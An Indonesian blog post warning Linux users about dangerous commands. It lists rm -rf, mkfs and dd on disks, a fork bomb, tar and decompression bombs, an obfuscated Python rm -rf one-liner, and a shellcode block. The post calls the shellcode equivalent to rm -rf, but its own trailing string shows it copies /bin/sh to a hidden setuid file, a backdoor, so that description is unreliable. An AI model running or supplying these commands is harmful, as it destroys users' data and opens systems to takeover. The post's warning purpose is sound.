Monday, June 18, 2012

Perintah-Perintah Berbahaya di Linux




Halo saya IsaBagus. Saya penulis baru di Linuxku.com. Saya di undang oleh sahabat saya Rizal Rahman untuk ikut menulis juga di blog Linuxku.com ini. Dan dalam kesempatan kali ini, saya ingin berbagi ilmu tentang Perintah Berbahaya di LinuxBanyak artikel yang membahas “7 perintah berbahaya di linux”, sebenarnya ada lebih dari 7. Dan yang berbahaya sebenarnya bukanlah perintahnya melainkan kelalaian user ketika menggunakan akses sebagai root, jadi sesungguhnya anda terbebas dari bahaya ini jika ketika anda menjadi root, anda berhati-hati.

Berikut adalah yang saya dapat dari ubuntuguide, gunakan sebagai pelajaran dan bukan untuk kejahatan.

1. Mengahapus semua yang ada di derektori
rm -rf /
rm -rf .
rm -rf *
rm -rf / mungkin tidak akan berhasil jika anda tidak memiliki akses root seperti memakai sudo, namun rm -rf . dan rm -rf * dapat menghapus apa saja di direktori dengan akses user biasa, jadi hati-hati.

2. Reformat data di device
mkfs.ext3 /dev/sda2
mkfs.apasaja /dev/sda3
Kemungkinan tak akan berhasil tanpa akses root, dan kalau pun berhasil data masih bisa dikembalikan.

3. Manipulasi block device
perintah_apa_saja > /dev/sda
dd if=apalah of=/dev/sda
Mengerikan, saya belum pernah coba ini tapi terlihat jika anda mencoba salah satunya maka block awal device (atau harddisk) akan menjadi raw atau format yang tidak dketahui.

4. ForkBomb
:(){:|:&};:        di bash
fork while fork di perl
saya tidak mengerti ini tapi ubuntuguide mengatakan perintah-perintah itu akan menyebabkan sistem menjadi hang.

5. Tarbomb
Menarik dunia linux, ternyata file tar archive oleh seseorang dapat digunakan untuk menginjeksi file-file ke dalam sistem atau dengan cara lain dapat menduplikat jutaan file. Pencegahannya, jika anda diminta untuk mengekstrak tar di derektori tertentu maka anda harus berhati-hati, ekstrak di direktori yang bersih, setelah yakin aman baru pindahkan pada direktori yang diminta.

6. Bom Decompression
File archive yang terlihat kecil namun saat didekompresi menjadi berukuran GB.

7. Mengeksekusi script yang tidak jelas sumbernya
Banyak yang beranggapan Linux itu tahan atau anti virus, ini keliru karena tidak ada OS yang tahan virus dan bug. Linux jarang terkena virus karena penggunanya selalu mengeksekusi script dari sumber yang diketahui seperti dari repository distronya atau dari situs dipercaya seperti launchpad, sourforge misalnya. Contoh berikut adalah script python
python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))'
dimana “sn!.sg!+” serupa dengan perintah rm -rf *. Jika dilihat script itu, bahkan yang mahir dengan python pun belum tentu menyadari bahayanya.
Contoh lain (saya belum pernah coba yang ini dan belum tahu cara menggunakannya):
char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";
ubuntuguide mengatakan ini sama dengan rm -rf ~ / &.

Jika anda memiliki tambahan perintah-perintah yang berbahaya yang lain silakkan berbagi disini.

Semoga Bermanfaat :)

Share:

0 komentar:

Post a Comment

Blog Archive